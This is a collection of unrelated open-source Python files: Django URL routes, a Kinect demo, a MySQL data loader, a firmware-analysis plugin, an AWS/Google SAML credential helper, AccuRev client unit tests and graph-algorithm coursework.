url(r'^admin/', include(admin.site.urls)),
url(r'^accounts/login/$', 'django.contrib.auth.views.login'),
url(r'^accounts/logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}),
url(r'', include('meddit.urls')),
)
|
kamyarg/enfame
|
metuly/urls.py
|
Python
|
gpl-2.0
| 489
|
#!/usr/bin/env python
import freenect
import signal
import matplotlib.pyplot as mp
from misc.demo import frame_convert
mp.ion()
image_rgb = None
image_depth = None
keep_running = True
def display_depth(dev, data, timestamp):
global image_depth
data = frame_convert.pretty_depth(data)
mp.gray()
mp.figure(1)
if image_depth:
image_depth.set_data(data)
else:
image_depth = mp.imshow(data, interpolation='nearest', animated=True)
mp.draw()
def display_rgb(dev, data, timestamp):
global image_rgb
mp.figure(2)
if image_rgb:
image_rgb.set_data(data)
else:
image_rgb = mp.imshow(data, interpolation='nearest', animated=True)
mp.draw()
def body(*args):
if not keep_running:
raise freenect.Kill
def handler(signum, frame):
global keep_running
keep_running = False
print('Press Ctrl-C in terminal to stop')
signal.signal(signal.SIGINT, handler)
freenect.runloop(depth=display_depth,
video=display_rgb,
body=body)
|
Dining-Engineers/left-luggage-detection
|
misc/demo/demo_mp_async.py
|
Python
|
gpl-2.0
| 1,051
|
#coding: utf-8
import csv
from read_conf import config
import MySQLdb as mysql
conn = mysql.connect(host='localhost',user='root',passwd='111111111',port=3306)
cur = conn.cursor()
def create_db():
count = cur.execute('create database if not exists shopping;')
print "create database",count
result = cur.fetchmany(count)
print result
conn.commit()
#cid代表用户的id
def create_trans_table():
conn.select_db('shopping')
cur = conn.cursor()
count = cur.execute('create table trans (trans_id int primary key,cid varchar(40),chain varchar(40),dept varchar(40),category varchar(40),company varchar(40),brand varchar(40),date varchar(40),productsize varchar(40),productmeasure varchar(40),purchasequantity varchar(40),purchaseamount varchar(40)) ENGINE = MyISAM ')
print "create table train",count
result = cur.fetchmany(count)
print result
conn.commit()
def insert_trans(conf):
conn.select_db('shopping')
f = open(conf["reduction_trans_dir"])
reader = csv.reader(f)
a = 0
for line in reader:
row_string = '"'+str(a)+'","'+'","'.join(line)+'"'
cur.execute('insert into trans values(%s);'%(row_string))
a += 1
if a % 10000 == 0 :
conn.commit()
print a
conn.commit()
def drop_table():
conn.select_db('shopping')
cur = conn.cursor()
count = cur.execute('drop table trans')
print "drop table train",count
result = cur.fetchmany(count)
print result
conn.commit()
#建索引 : create index cindex using btree on trans(cid);
def search_table(cid):
conn.select_db('shopping')
cur = conn.cursor()
count = cur.execute('select * from trans where cid = "%s"'%(cid))
result = cur.fetchmany(count)
return result
def search_table_with_ccb(category,company,brand):
conn.select_db('shopping')
cur = conn.cursor()
count = cur.execute('select productmeasure from trans where category = "%s" and \
company = "%s" and brand = "%s"'%(category,company,brand))
result = cur.fetchone()
return result[0]
def build_index():
conn.select_db('shopping')
cur = conn.cursor()
count = cur.execute('create index cindex using btree on trans(cid);')
result = cur.fetchmany(count)
return result
if __name__ == '__main__':
print "hello"
data_position_conf = config("../conf/data_position.conf")
drop_table()
create_db()
create_trans_table()
insert_trans(data_position_conf)
build_index()
#result = search_table('86246')
#print result[0]
|
lavizhao/shopping
|
python/create_trans_table.py
|
Python
|
gpl-2.0
| 2,625
|
import sys
from pathlib import Path
from analysis.PluginBase import AnalysisBasePlugin
from plugins.mime_blacklists import MIME_BLACKLIST_COMPRESSED
try:
from ..internal.string_eval import eval_strings
except ImportError:
sys.path.append(str(Path(__file__).parent.parent / 'internal'))
from string_eval import eval_strings
class AnalysisPlugin(AnalysisBasePlugin):
'''
Sort strings by relevance
Credits:
Original version by Paul Schiffer created during Firmware Bootcamp WT16/17 at University of Bonn
Refactored and improved by Fraunhofer FKIE
'''
NAME = 'string_evaluator'
DEPENDENCIES = ['printable_strings']
MIME_BLACKLIST = MIME_BLACKLIST_COMPRESSED
DESCRIPTION = 'Tries to sort strings based on usefulness'
VERSION = '0.2.1'
def __init__(self, plugin_administrator, config=None, recursive=True, timeout=300):
super().__init__(plugin_administrator, config=config, recursive=recursive, timeout=timeout, plugin_path=__file__)
def process_object(self, file_object):
list_of_printable_strings = file_object.processed_analysis['printable_strings']['strings']
file_object.processed_analysis[self.NAME] = dict(string_eval=eval_strings(list_of_printable_strings))
return file_object
|
fkie-cad/FACT_core
|
src/plugins/analysis/string_evaluation/code/string_eval.py
|
Python
|
gpl-3.0
| 1,282
|
""" configuration module for awsu, contains two objects """
import boto3
import sqlite3
import logging
import getpass
import datetime
import configparser
import uuid
import requests
import json
from dateutil.tz import tzutc
from urllib.parse import urlencode, quote_plus
from os import environ
from bs4 import BeautifulSoup
import base64
from lxml import etree
class Credential(object):
""" credential class """
def __init__(self):
self.conn = sqlite3.connect(environ.get('HOME') + '/.aws/config.db')
self.initialize_database('credentials')
def initialize_database(self, table):
cur = self.conn.cursor()
tables = cur.execute(
"SELECT name FROM sqlite_master WHERE type='table'").fetchall()
if not table in tables[0]:
stmt = '''CREATE TABLE %s(
profile text,
access_key text,
secret_key text,
session_token text,
expiration text)
''' % table[0]
cur.execute(stmt)
self.conn.commit()
def get_session(self, profile="default"):
if profile is None:
profile = "default"
cur = self.conn.cursor()
self.session = cur.execute(
"SELECT * FROM credentials WHERE profile=? LIMIT 1", (profile,))
self.session = self.session.fetchone()
if self.session is None or self.is_expired():
if self.is_expired():
cur.execute("DELETE FROM credentials WHERE profile=?", (profile,))
self.conn.commit()
creds = self.get_credentials(profile)
cur.execute("INSERT INTO credentials VALUES(?,?,?,?,?)", creds)
self.conn.commit()
return {
'AWS_ACCESS_KEY_ID': creds[1],
'AWS_SECRET_ACCESS_KEY': creds[2],
'AWS_SESSION_TOKEN': creds[3],
'AWS_SECURITY_TOKEN': creds[3]
}
else:
return {
'AWS_ACCESS_KEY_ID': self.session[1],
'AWS_SECRET_ACCESS_KEY': self.session[2],
'AWS_SESSION_TOKEN': self.session[3],
'AWS_SECURITY_TOKEN': self.session[3]
}
def get_credentials(self, profile="default"):
""" return aws profile environment variables """
if profile is None:
profile = 'default'
# get session token
if profile != 'saml':
session = boto3.Session(profile_name=profile)
sts = boto3.client('sts')
user = User()
token = getpass.getpass("Enter MFA Code : ")
if profile == "default":
res = sts.get_session_token(
DurationSeconds=3600,
SerialNumber=user.mfa,
TokenCode=token
)
elif profile == "saml":
config_file = configparser.RawConfigParser()
config_file.read(environ.get('HOME') + '/.aws/config')
if not config_file.has_section(profile):
config_file.add_section(profile)
username = str(input("Google Email : "))
idp_id = str(input('IDP ID : '))
sp_id = str(input('SP ID : '))
else:
username = config_file.get(profile, 'username')
idp_id = config_file.get(profile, 'idpid')
sp_id = config_file.get(profile, 'spid')
passwd = getpass.getpass('Password : ')
google = GoogleSAML(username, passwd, idp_id, sp_id)
google.auth()
saml_res = google.get_saml_response()
doc = etree.fromstring(base64.b64decode(saml_res))
roles = google.parse_roles(doc)
role_arn, provider = google.pick_one(roles)
config_file.set(profile, 'username', google.username)
config_file.set(profile, 'idpid', google.idp_id)
config_file.set(profile, 'spid', google.sp_id)
config_file.set(profile, 'role_arn', role_arn)
config_file.set(profile, 'provider', provider)
config_file.set(profile, 'durations', google.duration_seconds)
with open(environ.get('HOME') + '/.aws/config', 'w+') as f:
try:
config_file.write(f)
finally:
f.close()
print("Assuming " + config_file.get(profile, 'role_arn'))
sts = boto3.client('sts')
res = sts.assume_role_with_saml(
RoleArn=config_file.get(profile, 'role_arn'),
PrincipalArn=config_file.get(profile, 'provider'),
SAMLAssertion=saml_res,
DurationSeconds=config_file.get(profile, 'durations'))
else:
config_file = configparser.RawConfigParser()
config_file.read(environ.get('HOME') + '/.aws/credentials')
role_arn = config_file.get(profile, 'role_arn')
role_name = role_arn.split('/')[-1]
random_identifier = str(uuid.uuid4())[4:]
role_session = ''.join(
[user.username, role_name, random_identifier])
res = sts.assume_role(
RoleArn=role_arn,
RoleSessionName=role_session,
DurationSeconds=3600,
SerialNumber=user.mfa,
TokenCode=token
)
return (
profile,
res['Credentials']['AccessKeyId'],
res['Credentials']['SecretAccessKey'],
res['Credentials']['SessionToken'],
res['Credentials']['Expiration']
)
def clean_environment(self):
""" remove aws environment variables """
for var in list(environ.keys()):
if var.startswith('AWS_'):
del environ[var]
def is_expired(self):
try:
stored_date = self.session[4]
except:
return False
now = datetime.datetime.utcnow()
session_time = datetime.datetime.strptime(
stored_date,
'%Y-%m-%d %H:%M:%S+00:00')
return now > session_time
class User(object):
def __init__(self):
sts = boto3.client('sts')
caller = sts.get_caller_identity()
self.arn = caller['Arn']
self.account_id = caller['Account']
self.username = self.get_username()
self.mfa = self.get_mfa()
def get_username(self):
username = str(self.arn).split('/')[-1]
return username
def get_mfa(self):
mfa = "arn:aws:iam::" + self.account_id + ":mfa/" + self.username
return mfa
class GoogleSAML(object):
def __init__(self, username, passwd, idp_id, sp_id):
""" method for google saml auth init"""
self.username = username
self.password = passwd
self.idp_id = idp_id
self.sp_id = sp_id
self.duration_seconds = 3600
payload = {
'idpid': str(self.idp_id),
'spid': str(self.sp_id),
'forceauthn': 'false'
}
params = urlencode(payload, quote_via=quote_plus)
self.url = "https://accounts.google.com/o/saml2/initsso?" + params
def auth(self):
self.request = requests.Session()
res = self.request.get(self.url)
res.raise_for_status()
page = BeautifulSoup(res.text, 'html.parser')
gaia_loginform = page.find(
'form', {'id': 'gaia_loginform'}).get('action')
payload = {}
payload['gxf'] = page.find('input', {'name': 'gxf'}).get('value')
payload['continue'] = page.find(
'input', {'name': 'continue'}).get('value')
payload['ltmpl'] = page.find('input', {'name': 'ltmpl'}).get('value')
payload['sarp'] = 1
payload['scc'] = 1
payload['oauth'] = page.find('input', {'name': 'oauth'}).get('value')
payload['_utf8'] = page.find('input', {'name': '_utf8'}).get('value')
payload['bgresponse'] = page.find(
'input', {'name': 'bgresponse'}).get('value')
payload['Email'] = self.username
payload['Passwd'] = self.password
res = self.request.post(gaia_loginform, data=payload)
res.raise_for_status()
self.request.headers['Referer'] = res.url
page = BeautifulSoup(res.text, 'html.parser')
payload['ProfileInformation'] = page.find(
'input', {'name': 'ProfileInformation'}).get('value')
payload['SessionState'] = page.find(
'input', {'name': 'SessionState'}).get('value')
payload['Passwd'] = self.password
passwd_challenge_url = page.find(
'form', {'id': 'gaia_loginform'}).get('action')
res = self.request.post(passwd_challenge_url, data=payload)
res.raise_for_status()
self.request.headers['Referer'] = res.url
if "challenge/az" in res.url:
res = self.auth_prompt(res, payload)
self.session_state = res
def auth_prompt(self, session, payload):
res = BeautifulSoup(session.text, 'html.parser')
auth_url = session.url.split('?')[0]
data_key = res.find('div', {'data-api-key': True}).get('data-api-key')
data_tx_id = res.find('div', {'data-tx-id': True}).get('data-tx-id')
params = {
'alt': 'json',
'key': data_key
}
params = urlencode(params, quote_via=quote_plus)
prompt_url = "https://content.googleapis.com/cryptauth/v1/authzen/awaittx?" + params
prompt_body = {'txId': data_tx_id}
print("Open the Google App, and tap 'Yes' on the prompt to sign in ...")
self.request.headers['Referer'] = session.url
res_prompt = self.request.post(prompt_url, json=prompt_body)
parsed = json.loads(res_prompt.text)
payload = {
'challengeId': res.find('input', {'name': 'challengeId'}).get('value'),
'challengeType': res.find('input', {'name': 'challengeType'}).get('value'),
'continue': res.find('input', {'name': 'continue'}).get('value'),
'scc': res.find('input', {'name': 'scc'}).get('value'),
'sarp': res.find('input', {'name': 'sarp'}).get('value'),
'TL': res.find('input', {'name': 'TL'}).get('value'),
'gxf': res.find('input', {'name': 'gxf'}).get('value'),
'token': parsed['txToken'],
'action': res.find('input', {'name': 'action'}).get('value'),
'TrustDevice': 'on',
}
res = self.request.post(auth_url, data=payload)
res.raise_for_status()
return res
def get_saml_response(self):
res = BeautifulSoup(self.session_state.text, 'html.parser')
saml_response = res.find(
'input', {'name': 'SAMLResponse'}).get('value')
return saml_response
def parse_roles(self, doc):
roles = {}
for x in doc.xpath('//*[@Name = "https://aws.amazon.com/SAML/Attributes/Role"]//text()'):
if "arn:aws:iam:" not in x:
continue
res = x.split(',')
roles[res[0]] = res[1]
return roles
def pick_one(self, roles):
while True:
for i, role in enumerate(roles):
print("[{:>3d}] {}".format(i + 1, role))
prompt = 'Type the number (1 - {:d}) of the role to assume: '.format(
len(roles))
choice = input(prompt)
try:
num = int(choice)
return list(roles.items())[num - 1]
except:
print("Invalid choice, try again")
|
rizkidoank/awsu
|
awsu/config.py
|
Python
|
gpl-3.0
| 11,653
|
from distutils.core import setup
from program_version import RELEASE
setup(name='program',
version=RELEASE,
description='A self updating program example',
author='Mr Snow',
author_email='ninja@snow.com',
url='https://github.com/mr-ninja-snow/Self-Updating-Python-Program.git',
packages=[],
)
|
mr-ninja-snow/Self-Updating-Python-Program
|
setup.py
|
Python
|
gpl-3.0
| 334
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import os
import collections
import mock
import accurev.client
import accurev.depot
class TestAccuRevClient(unittest.TestCase):
def setUp(self):
self.client = accurev.client.Client()
def test_cmd(self):
self.client.chdir('somedirectory')
expected = "accurev somecommand"
with mock.patch.object(accurev.utils, "cmd") as mocked:
self.client.cmd('somecommand')
mocked.assert_called_once_with('accurev somecommand', 'somedirectory')
def test_xml_cmd(self):
with mock.patch.object(self.client, "tempfile_cmd") as mocked:
self.client.xml_cmd('somestring')
mocked.assert_called_once_with('xml', 'somestring')
def test_info(self):
string = """Shell: /bin/bash
Principal: automaticTasks
Host: madprdci2
Domain: (none)
Server name: 169.0.0.1
Port: 5050
DB Encoding: Unicode
ACCUREV_BIN: /opt/accurev-5.5/bin
Client time: 2017/05/14 04:29:59 CEST (1494728999)
Server time: 2017/05/14 04:30:00 CEST (1494729000)"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = string, ''
self.assertTrue(isinstance(self.client.info, dict))
expected = [
'Shell',
'Principal',
'Host',
'Domain',
'Server name',
'Port',
'DB Encoding',
'ACCUREV_BIN',
'Client time',
'Server time',
]
self.assertEqual(len(self.client.info.keys()), len(expected))
def test_depot_count(self):
string = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="show depots"
TaskId="12492">
<Element
Number="1"
Name="OFFICE"
Slice="1"
exclusiveLocking="false"
case="insensitive"
locWidth="128"/>
<Element
Number="2"
Name="PROVIDER"
Slice="2"
exclusiveLocking="false"
case="insensitive"
locWidth="128"/>
</AcResponse>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = string, ''
depots = self.client.depots
self.assertEqual(len(depots.keys()), 2)
for d in depots.values():
self.assertTrue(isinstance(d, accurev.depot.Depot))
def test_login_permanent(self):
with mock.patch.object(self.client, "cmd") as mocked:
self.client.login('user', 'pass', permanent=True)
mocked.assert_called_once_with('login -n user pass')
def test_users(self):
xml = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="show users"
TaskId="647018">
<Element
Number="1"
Name="Administrator"
Kind="full"/>
<Element
Number="2"
Name="SomeoneElse"
Kind="full"/>
</AcResponse>"""
with mock.patch.object(self.client, "user_show") as mocked:
mocked.return_value = xml
users = list(self.client.users)
self.assertTrue(len(users), 2)
def test_tempfile_cmd(self):
with mock.patch.object(accurev.client.tempfile, "NamedTemporaryFile") as mocktmp:
mocktmp.return_value = open('notrandomfile', 'w')
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = 'stdout', 'stderr'
self.client.tempfile_cmd('xml', 'world')
mocked.assert_called_once_with('xml -l notrandomfile')
if os.path.isfile('notrandomfile'):
os.unlink('notrandomfile')
def test_group_show_no_user(self):
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = '', ''
self.client.group_show()
mocked.assert_called_once_with('show -fx groups')
def test_group_show_with_user(self):
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = '', ''
self.client.group_show('user')
mocked.assert_called_once_with('show -fx -u user groups')
def test_member_show(self):
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = '', ''
self.client.member_show('group')
mocked.assert_called_once_with('show -fx -g group members')
def test_cpkdescribe(self):
query = "<AcRequest>\n"
query += "\t<cpkdescribe>\n"
query += "\t\t<depot>mycompany</depot>\n"
query += "\t\t<stream1>some_stream</stream1>\n"
query += "\t\t<issues>\n"
query += "\t\t\t<issueNum>1010</issueNum>\n"
query += "\t\t</issues>\n"
query += "\t</cpkdescribe>\n"
query += "</AcRequest>"
response = """<?xml version="1.0" encoding="utf-8"?>
<acResponse>
<issues>
<issue ancestry="direct">
<issueNum fid="1">1010</issueNum>
</issue>
</issues>
</acResponse>"""
with mock.patch.object(self.client, "xml_cmd") as mocked:
mocked.return_value = response, ''
issues = self.client.cpkdescribe(['1010'], 'mycompany', 'some_stream')
mocked.assert_called_once_with(query)
def test_schema(self):
response = """<?xml version="1.0" encoding="UTF-8"?>
<template name="default">
<lookupField fid="5"/>
<field name="issueNum" type="internal" label="Issue" reportWidth="10" fid="1"></field>
<field name="transNum" type="internal" label="Transaction" reportWidth="10" fid="2"> </field>
<field name="shortDescription" type="Text" label="Short Description" reportWidth="150" width="60" fid="3"></field>
<field name="state" type="Choose" label="State" reportWidth="10" fid="4">
<value>Open</value>
<value>Cancelled</value>
<value>Closed</value>
</field>
<field name="JIRA" type="Text" label="Jira Issue" reportWidth="10" width="15" fid="5"></field>
</template>"""
with mock.patch.object(self.client, "getconfig") as mocked:
mocked.return_value = response, ''
schema = self.client.schema('mycompany')
mocked.assert_called_once_with('mycompany', 'schema.xml')
def test_element_promote(self):
response = "<elements>\n"
response += """\t<e eid="10" v="1/1"/>\n"""
response += """\t<e eid="11" v="2/2"/>\n"""
response += "</elements>"
class Element:
pass
element_one = Element()
element_one.eid = "10"
element_one.real_version = "1/1"
element_two = Element()
element_two.eid = "11"
element_two.real_version ="2/2"
element_list = [
element_one,
element_two
]
with mock.patch.object(self.client, "tempfile_cmd") as mocked:
self.client.element_promote(element_list, 'hello', 'world')
mocked.assert_called_once_with('promote -s hello -S world -Fx', response)
def test_issue_query(self):
expected = """<queryIssue issueDB="mycompany" useAltQuery="false">\n"""
expected += "\t<OR>\n"
expected += "\t\t<condition>1 == 10</condition>\n"
expected += "\t\t<condition>1 == 20</condition>\n"
expected += "\t</OR>\n"
expected += "</queryIssue>"
response = """<?something>\n"""
response += """<issueOne/>"""
response += """<issueTwo/>"""
with mock.patch.object(self.client, "xml_cmd") as mocked:
mocked.return_value = response, ''
out, err = self.client.issue_query('mycompany', ['10', '20'])
mocked.assert_called_once_with(expected)
def test_stream_show(self):
response = """<?xml version="1.0" encoding="utf-8"?>
<streams>
<stream
name="trunk"
depotName="OFFICE"
streamNumber="1"
isDynamic="true"
type="normal"
startTime="1197383792"
hasDefaultGroup="false"/>
</streams>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = response, ''
self.client.stream_show('mycompany', 'trunk')
mocked.assert_called_once_with('show -p mycompany -fxg -s trunk streams')
def test_stream_children(self):
response = """<?xml version="1.0" encoding="utf-8"?>
<streams>
<stream
name="trunk"
depotName="OFFICE"
streamNumber="1"
isDynamic="true"
type="normal"
startTime="1197383792"
hasDefaultGroup="false"/>
</streams>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = response, ''
self.client.stream_children('mycompany', 'trunk')
mocked.assert_called_once_with('show -p mycompany -fexvg -1 -s trunk streams')
def test_stream_family(self):
response = """<?xml version="1.0" encoding="utf-8"?>
<streams>
<stream
name="trunk"
depotName="OFFICE"
streamNumber="1"
isDynamic="true"
type="normal"
startTime="1197383792"
hasDefaultGroup="false"/>
</streams>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = response, ''
self.client.stream_family('mycompany', 'trunk')
mocked.assert_called_once_with('show -p mycompany -fexvg -r -s trunk streams')
def test_stream_issues(self):
expected = [
'issuelist -p mycompany -fx -s some_stream',
'issuelist -p mycompany -fx -s some_stream -i',
]
response = """<?xml version="1.0" encoding="utf-8"?>
<acResponse>
<issues>
<issue ancestry="direct">
<issueNum fid="1">101010</issueNum>
<transNum fid="2">4105368</transNum>
<shortDescription fid="3">Some fancy description</shortDescription>
<state fid="4">Open</state>
<JIRA fid="5">JIRA-10</JIRA>
</issue>
<issue ancestry="direct">
<issueNum fid="1">202020</issueNum>
<transNum fid="2">4106525</transNum>
<shortDescription fid="3">Another Fancy Description</shortDescription>
<state fid="4">Closed</state>
<JIRA fid="5">JIRA-20</JIRA>
</issue>
</issues>
</acResponse>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = response, ''
# Ensure we prime the generator, otherwise nosetests won't consider
# the method as executed.
issues = list(self.client.stream_issues('mycompany', 'some_stream'))
for e in expected:
mocked.assert_any_call(e)
def test_stream_stat_default_group(self):
response = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="stat"
Directory="/jenkins/home/jenkins/pruebas/joaogn/pyacc"
TaskId="302012">
<element
location="/./ITQA"
dir="yes"
executable="no"
id="138803"
elemType="dir"
modTime="0"
hierType="parallel"
Virtual="2094/1"
namedVersion="ING_PRO_ITQA/1"
Real="32/1"
status="(backed)"/>
</AcResponse>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = response, ''
elements = list(self.client.stream_stat('some_stream', default_group=True))
mocked.assert_called_once_with('stat -fexv -s some_stream -d')
def test_stream_stat_all(self):
response = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="stat"
Directory="/jenkins/home/jenkins/pruebas/joaogn/pyacc"
TaskId="302012">
<element
location="/./ITQA"
dir="yes"
executable="no"
id="138803"
elemType="dir"
modTime="0"
hierType="parallel"
Virtual="2094/1"
namedVersion="ING_PRO_ITQA/1"
Real="32/1"
status="(backed)"/>
</AcResponse>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = response, ''
elements = list(self.client.stream_stat('some_stream', default_group=False))
mocked.assert_called_once_with('stat -fexv -s some_stream -a')
def test_modify_issue(self):
expected = """<modifyIssue issueDB="mycompany">\n"""
expected += "\t<issue>\n"
expected += """\t\t<one fid="1">1</one>\n"""
expected += """\t\t<two fid="2">2</two>\n"""
expected += "\t</issue>\n"
expected += "</modifyIssue>\n"
properties = collections.OrderedDict()
properties['one'] = {
'fid': '1',
'value': '1',
}
properties['two'] = {
'fid': '2',
'value': '2',
}
with mock.patch.object(self.client, "xml_cmd") as mocked:
mocked.return_value = '', ''
result = self.client.modify_issue(properties, 'mycompany')
mocked.assert_called_once_with(expected)
def test_cpkhist(self):
expected = '<acRequest>\n'
expected += '\t<cpkhist verbose="true">\n'
expected += '\t\t<depot>mycompany</depot>\n'
expected += '\t\t<issues>\n'
expected += '\t\t\t<issue>\n'
expected += '\t\t\t\t<issueNum>1</issueNum>\n'
expected += '\t\t\t</issue>\n'
expected += '\t\t\t<issue>\n'
expected += '\t\t\t\t<issueNum>2</issueNum>\n'
expected += '\t\t\t</issue>\n'
expected += '\t\t</issues>\n'
expected += '\t</cpkhist>\n'
expected += '</acRequest>'
with mock.patch.object(self.client, "xml_cmd") as mocked:
mocked.return_value = '', ''
result = self.client.cpkhist(['1', '2'], 'mycompany')
mocked.assert_called_once_with(expected)
def test_issue_promote(self):
expected = '<issues>\n'
expected += '\t<id>1</id>\n'
expected += '\t<id>2</id>\n'
expected += '</issues>'
with mock.patch.object(self.client, "tempfile_cmd") as mocked:
self.client.issue_promote(['1', '2'], 'source', 'target')
mocked.assert_called_once_with('promote -s source -S target -Fx', expected)
def test_default_group_promote(self):
with mock.patch.object(self.client, "cmd") as mocked:
self.client.default_group_promote('source', 'target')
mocked.assert_called_once_with('promote -s source -S target -d')
def test_refs_show(self):
xml = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="show refs"
TaskId="316705">
<Element
Name="reftree_one"
Storage="E:/RefTree/reftree_one"
Host="hostname"
Type="3"
user_id="1"
Stream="20"
user_name="Administrator"/>
</AcResponse>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = xml, ''
self.client.refs_show()
mocked.assert_called_once_with('show -fexv refs')
def test_hist(self):
xml = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="hist"
TaskId="646546">
<element
id="100">
<transaction
id="2020"
type="promote"
time="1495051170"
user="JohnDoe"
streamName="StreamDestination"
streamNumber="13638"
fromStreamName="StreamOrigin"
fromStreamNumber="13752">
<comment>A nice comment</comment>
<version
path="/some/path"
eid="90"
virtual="13638/2"
real="18125/1"
virtualNamedVersion="StreamDestination/2"
realNamedVersion="UserWorkspace/1"
elem_type="text"
dir="no">
<issueNum>50</issueNum>
</version>
</transaction>
</element>
</AcResponse>"""
with mock.patch.object(self.client, "cmd") as mocked:
mocked.return_value = xml, ''
self.client.hist('100', 'mycompany')
mocked.assert_called_once_with('hist -fexv -p mycompany -e 100')
def test_cpkdepend(self):
xml = """<?xml version="1.0" encoding="utf-8"?>
<AcResponse
Command="cpkdepend"
TaskId="646546">
<issueDependencies>
<issueDependency>
<dependencies>
<issue number="10"/>
</dependencies>
</issueDependency>
</issueDependencies>
</AcResponse>"""
response = """<?something>\n"""
response += """<issueOne/>"""
response += """<issueTwo/>"""
with mock.patch.object(self.client, "cmd") as mocked_cmd:
mocked_cmd.return_value = xml, ''
with mock.patch.object(self.client, "issue_query") as mocked_query:
mocked_query.return_value = response, ''
self.client.cpkdepend(['10', '20'], 'mycompany', 'source', 'target')
mocked_cmd.assert_called_once_with('cpkdepend -fvx -p mycompany -s source -S target -I 10,20')
|
grilo/pyaccurev
|
tests/test_client.py
|
Python
|
gpl-3.0
| 19,204
|
"""
Algorithmic Thinking 1
wk 4
Aplication #2
Questions
"""
# imports
import urllib2
import random
import time
import math
import UPATrial
import numpy
from collections import deque
import matplotlib.pyplot as plt
############################################
def copy_graph(graph):
"""
Make a copy of a graph
"""
new_graph = {}
for node in graph:
new_graph[node] = set(graph[node])
return new_graph
def delete_node(ugraph, node):
"""
Delete a node from an undirected graph
"""
neighbors = ugraph[node]
ugraph.pop(node)
for neighbor in neighbors:
if neighbor in ugraph and node in ugraph[neighbor]:
ugraph[neighbor].remove(node)
def targeted_order(ugraph):
"""
Compute a targeted attack order consisting
of nodes of maximal degree
Returns:
A list of nodes
"""
# copy the graph
new_graph = copy_graph(ugraph)
order = []
while len(new_graph) > 0:
max_degree = -1
for node in new_graph:
if len(new_graph[node]) > max_degree:
max_degree = len(new_graph[node])
max_degree_node = node
neighbors = new_graph[max_degree_node]
new_graph.pop(max_degree_node)
for neighbor in neighbors:
new_graph[neighbor].remove(max_degree_node)
order.append(max_degree_node)
return order
##########################################################
# Code for loading computer network graph
NETWORK_URL = "http://storage.googleapis.com/codeskulptor-alg/alg_rf7.txt"
def load_graph(graph_url):
"""
Function that loads a graph given the URL
for a text representation of the graph
Returns a dictionary that models a graph
"""
graph_file = urllib2.urlopen(graph_url)
graph_text = graph_file.read()
graph_lines = graph_text.split('\n')
graph_lines = graph_lines[ : -1]
print "Loaded graph with", len(graph_lines), "nodes"
answer_graph = {}
for line in graph_lines:
neighbors = line.split(' ')
node = int(neighbors[0])
answer_graph[node] = set([])
for neighbor in neighbors[1 : -1]:
answer_graph[node].add(int(neighbor))
return answer_graph
def make_complete_graph(num_nodes):
"""
Takes the number of nodes num_nodes and returns a dictionary corresponding to a complete directed graph with the specified number of nodes. A complete graph contains all possible edges subject to the restriction that self-loops are not allowed.
"""
if num_nodes <= 0:
return {}
dict_graph = {}
for node in range(num_nodes):
node_set = set()
for neighbor in range(num_nodes):
if node != neighbor:
node_set.add(neighbor)
dict_graph[node] = node_set
return dict_graph
def gen_er_graph(num_nodes, probability):
""" pseudocode:
algorithm for generating random undirected graphs (ER graphs)
Algorithm 1: ER
Input: Number of nodes n; probability p,
Output: A graph g = (V, E) where g is an element of G(n, p)
1 V <-- {0, 1, ... n-1};
2 E <-- null;
3 foreach {i, j} that is a unique element of V, where i is not j do
4 a <-- random(0, 1); // a is a random real number in [0, 1)
5 if a < p then
6 E <-- E union {{i, j}};
7 return g = (V, E)
You may wish to modify your implementation of make_complete_graph from Project 1 to add edges randomly
"""
if num_nodes <= 0:
return {}
dict_graph = {}
for node in range(num_nodes):
node_set = set() # edges
for neighbor in range(num_nodes):
random_value = random.random()
if node != neighbor and random_value < probability:
node_set.add(neighbor)
dict_graph[node] = node_set
return dict_graph
def test_gen_er_graph():
""" tests gen_er_graph function """
print "num_nodes = 0, probability = .004"
print gen_er_graph(0, .004)
print "num_nodes = 5, probability = .004"
print gen_er_graph(5, .004)
print "num_nodes = 10, probability = .004"
print gen_er_graph(10, .004)
print "num_nodes = 10, probability = .5"
print gen_er_graph(10, .5)
# print gen_er_graph(1200, .004)
def gen_upa_graph(final_nodes, num_nodes, probability):
"""
generates a random undirected graph iteratively, where in each iteration a new node is created and added to the graph, connected to a subset of the existing nodes. The subset is chosen based on in-degrees of existing nodes.
n: final_nodes
m: num_nodes
"""
if num_nodes > final_nodes or final_nodes < 1:
return {}
# create random undirected graph on m nodes (num_nodes)
graph = gen_er_graph(num_nodes, probability)
V = []
E = []
total_indeg = 0
for key in graph:
V.append(key)
E.append([key,graph[key]])
# grow the graph by adding n - m (final_nodes - num_nodes) nodes
# where each new node is connected to m nodes randomly chosen
# from the set of existing nodes. Elimintate duplicates
# to avoid parallel edges.
for node_added in range(num_nodes, final_nodes):
# for key in graph:
# for value in graph[key]:
# total_indeg += value
V_prime = set()
# choose randomly m nodes from V and add them to V_prime
# where the probability of choosing node j is (indeg(j) + 1)/(totindeg + |V|)
# i.e., call DPATrial (line 6 in pseudocode)
trial = UPATrial.UPATrial(num_nodes)
V_prime = trial.run_trial(num_nodes)
for node in V_prime:
V_prime.add(node)
V.append(node_added)
graph[node_added] = V_prime
return graph
def random_order(graph):
""" returns a list of nodes in the graph in a random order """
keys_list = []
for key in graph:
keys_list.append(key)
random.shuffle(keys_list)
return keys_list
def test_random_order():
